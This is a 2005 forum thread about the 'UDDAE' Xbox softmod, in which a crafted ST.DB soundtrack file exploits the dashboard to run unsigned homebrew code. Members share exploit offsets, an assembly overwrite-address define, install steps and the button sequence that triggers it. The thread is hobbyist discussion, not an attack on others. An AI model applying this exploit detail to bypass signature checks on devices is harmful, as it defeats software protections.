Post by: dumdasme on October 09, 2005, 02:10:00 PM
Nice work rmenhal! this fixed the problem I was having with my 5838.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: PedrosPad on October 09, 2005, 03:16:00 PM
QUOTE(rmenhal @ Oct 9 2005, 06:00 PM)
Decided to take a peek here after a long time. smile.gif
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 09, 2005, 03:24:00 PM
beerchug.gif  beerchug.gif .. so I assume it will work on all other kernels too.. it works in my 5101.. only MS can give us three exploitable .xbe in one dash..lol
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: eh. on October 09, 2005, 11:22:00 PM
QUOTE(xman954 @ Oct 9 2005, 11:51 AM)
NP (eh..) will be happy too  smile.gif

Ecstatic; the generic UDDAE st.db (with 00001B000h D5960_offset) works on my box, as does the kernel specific eh! bdaybiggrin.gif
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Cio on October 10, 2005, 05:59:00 AM
beerchug.gif  GJ

    Xbox: What happen?
    HD: Somebody set up us the exploit.
    Kernel: We get signal.
    Xbox: What!
    Kernel: Main screen turn on.
    Xbox: It's you!!
    xman954: How are you gentlemen!!
    rmenhal: All your box are belong to us.
    xman954: You are on the way to homebrew.
    Xbox: What you say!!
    rmenhal: You have no chance to check sig's make your time.
    rmenhal & xman954: Ha Ha Ha Ha ....

P.S. nice to see you again eh tongue.gif

(please excuse the rant, you all got me in a good mood on Monday, not something that happens a lot).
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dus on October 10, 2005, 10:52:00 AM
QUOTE(rmenhal @ Oct 10 2005, 06:27 PM)
That just stands for 'overwritten address', it's not any technical acronym. Those addresses
locate the pointer to a structure used by the XDK debugger (I think - I don't have the XDK.)

Ahh, of course! Now that makes sense. I wondered what all those fs:[20h]+250h and calls all over
the code were doing.

QUOTE(rmenhal @ Oct 10 2005, 06:27 PM)
Perhaps there is a writable function pointer in a fixed location somewhere in the
XBE (instead of the kernel), with a call close enough to the overwrite position, but I didn't
look for one. The exploit could be made kernel version independent with that.

Yes, that would be more elegant, but hardly necessary and may not even be possible.

Thanks for clearing that up! (It has been nagging at me for a while now.)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on October 11, 2005, 08:22:00 AM
smile.gif
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 11, 2005, 09:23:00 AM
CODE
%elifdef MS_4627_01
OWA  equ 80035C04h+250h; MS 4627.01
from the hulk st.db
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 11, 2005, 11:45:00 AM
ok, a few ?s about this ST.DB exploit.

1. I have problems getting the right 4920 uberdash. Slayers 2.5 comes with a 4920, but that's not the uberdash one. So, NP linked to a thread that has PPF files (I got them already) to convert the non uberdash from slayers 2.5 to the uberdash one. Do these patches create me a real working uberdash that I can actually use?

2. The ST.DB that rmenhal posted, what habibi signed xbe does it load?

thanks in advance

Horscht
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 11, 2005, 12:03:00 PM
thanks to rmenhal it works fine, 3944.4034 so far..
http://forums.xbox-s...dpost&p=2973832
just put the offset in D5960_offset, 1B000h
and change the + to - in the next line, there is the 'generic'

both boot E:\default.xbe

slayers2.5 MSdash is all that you need + PPF patch
to get everything working
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: dus on October 11, 2005, 03:21:00 PM
QUOTE(dus @ Oct 11 2005, 10:19 PM)
...I guess the kernel _specific_ ST.DB posted by rmenhal should work on a normal 4920 dash.


Checked it and it works fine. (On a 5101 box using PBL to load Evox M8 bios, don't ask...)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 12, 2005, 11:11:00 AM
unfortunately, this can't be used without problems on krazie's Ndure installer. krazie's ndure doesn't come with smaller fillers, but a rather big shadowC.img. So krazie's ndure setup lacks the free space for this setup. Just thought I'd mention it.

Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 12, 2005, 11:28:00 AM
I'm sure that when you are smart enough to figure this stuff out you're also capable of playing with the shadow C a little like removing it and add a smaller one...

If this makes it to the next installer I of course take care of all necessary adjustments.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 12, 2005, 11:40:00 AM
yeah, I just tried it (I didn't have any problems making myself a smaller shadowc.img, I was just mentioning it for the next version of your installer smile.gif ), and it works fine. I had problems at first, because I forgot to habibi sign the UnleashX default.xbe tongue.gif. I almost got pissed until I realized that. It works very good on my 5838 kernel. Thanks rmenhal and xman for your work.

What I'll do next, is to use the xbe shortcutmaker (there is one by the avalaunch team, I think), to create a shortcut xbe to the gamesave. I will put the shortcut (habibi signed this time laugh.gif ) into the root of E named default.xbe, and the gamesave should load.

all in all: thanks for all your work rmenhal and xman.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Textbook on October 13, 2005, 09:37:00 PM
I haven't read this thread since the day it was made, and I don't have anything to offer, so I just read through it tonight for an update.  I just wanted to say wow!  It really says something when you can (re)introduce an idea and it can be made into a success in just a few days.  It shows a lot about the knowledge, intelligence, and determination of the people of Xbox-Scene.  (especially xman954 and rmenhal)

As I don't know as much about this as you guys do, I think I have the following correct.  The UDDAE exploit works like SCEEE does for UXE.  Except this works with NDURE (which is even better).  Basically, this can completely turn the softmod on and off.  I'm going to try and get this correct, but please correct me if I'm wrong and if I do get it wrong, sorry about trashing the thread and creating more confusion.

1.  The normal, retail MS Dash (5960) would load.
2.  Trigger the EEE by doing the <<Eggsbox>> thing.
3.  This would launch the uberdash (4920)
4.  You would load a retail CD and then go to copy, copy, a, a, a.  ?? ( I have no idea)
5.  This would launch a habibi xbe ??

How does Ndure work with this?  Man, I must sound stupid, as I don't know much about the development side of anything.

Also, would this work like the SCEEE, where it would be turned on and off via a EEE Switcher?  Or would it boot up to the normal 5960 every time?

Congratulations on the great accomplishment you guys.
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: krayzie on October 13, 2005, 10:24:00 PM
QUOTE(Textbook @ Oct 14 2005, 05:48 AM)
I haven't read this thread since the day it was made, and I don't have anything to offer, so I just read through it tonight for an update.  I just wanted to say wow!  It really says something when you can (re)introduce an idea and it can be made into a success in just a few days.  It shows a lot about the knowledge, intelligence, and determination of the people of Xbox-Scene.  (especially xman954 and rmenhal)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Horscht on October 13, 2005, 10:57:00 PM
QUOTE(krayzie @ Oct 14 2005, 06:35 AM)
Also you don't need an audio cd to launch the audio exploit. (at least I assume this is the no cd version. I haven't tried it myself yet.)
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: xman954 on October 13, 2005, 11:52:00 PM
it is the no CD version
and there is a blank sound track to copy (in the st.db itself)
no need for any thing else
also too the switcher xbe could rename
a real st.db to use in the modded state ( so you could have in game music)
then when switched off put back the hacked one
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: rgtaa on October 14, 2005, 05:27:00 PM
did anyone make a package for this yet?
... and if so can you please just give the correct name for it ... so I can go easter egg hunting in the usual places.
One of my xbox's still has uxe on it because I like the sceee exploit... it would be nice to have this type exploit on my ndure xbox's.
Thanks guys for figuring it all out!
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on November 22, 2005, 12:16:00 AM
{@ rgtaa: http://forums.xbox-s...dpost&p=3052414 @}
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: kingroach on November 25, 2005, 10:48:00 AM
here is the new generic st.db xman emailed to me, includes any path support:

CODE
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on December 18, 2005, 12:08:00 PM
QUOTE(Horscht @ Oct 12 2005, 10:18 AM)

unfortunately, this can't be used without problems on krazie's Ndure installer. krazie's ndure doesn't come with smaller fillers, but a rather big shadowC.img. So krazie's ndure setup lacks the free space for this setup. Just thought I'd mention it.

Krayzie: maybe you should consider a slightly smaller shadowC.img on the next version of your installer and add a few smaller filler files. Just a suggestion, tho
{= Actually, UDDAE can be more easily implemented another (safe) way with krazie's Ndure 1.0.  I wonder if any one reading this understands the MS dash's setup requirements sufficiently to realize how... =}

It's even easier for Ndure 2.1 users of course; they can now benefit automatically from its 21 MB "future use" filler...

Get kingroach's 3.0 (currently beta; see his sig) and do 'Add Ndure Toolset';
only have that option checked, it's in the UDDAE section, then:

copy the resultant E\ndts folder(&contents) on the PC over to the Xbox's /E/

(if you have existing MS dash soundtracks and want to keep them,
then rename your /E/TDATA/fffe000/music/ST.DB so it remains available)

launch /E/ndts/default.xbe (to start red LED, realC mode)

select 'Install Menu'>'Install UDDAE'

When you restart the Xbox it will behave as before, plus you can now get from the MS dash to the softmod by pressing:

[Music][blank soundtrack][Copy][Select][Copy][New Soundtrack]
<<Eggs|3ox>> (that's two '<' Symbols, Shift E, g, g, s, beta Accent '|3', o, x and two '>' Symbols)
[Done](uberdash starts)[Music][blank soundtrack][Copy][Copy][New Soundtrack][Done]
Title: Wanted... "rmenhal-like" Skills For Development Of
Post by: Ndure protagonist on December 22, 2005, 10:05:00 AM
QUOTE(Ndure protagonist @ Dec 18 2005, 12:15 PM)
{= Actually, UDDAE can be more easily implemented another (safe) way with krazie's Ndure 1.0.  I wonder if any one reading this understands the MS dash's setup requirements sufficiently to realize how... =}
{= The Audio folders/files can be replaced by others that consume their space... =}

For example, the previous post's steps could alternatively be performed (with no adverse consequences) after deleting these 21 MB consuming files from /C/Audio/AmbientAudio:
CODE
AMB_05_ENGINEROOM_LR.wav
AMB_06_COMMUNICATION_LR.wav
AMB_12_HYDROTHUNDER_LR.wav
AMB_EC_Steam1.wav
AMB_EC_Steam2.wav
AMB_EC_Steam4.wav
AMB_EC_Steam5.wav
AMB_EC_Steam6.wav
AMB_EC_Steam7.wav
{&
Non kingroach Ndure users would need to launch a different XBE via the ST.DB though...
&}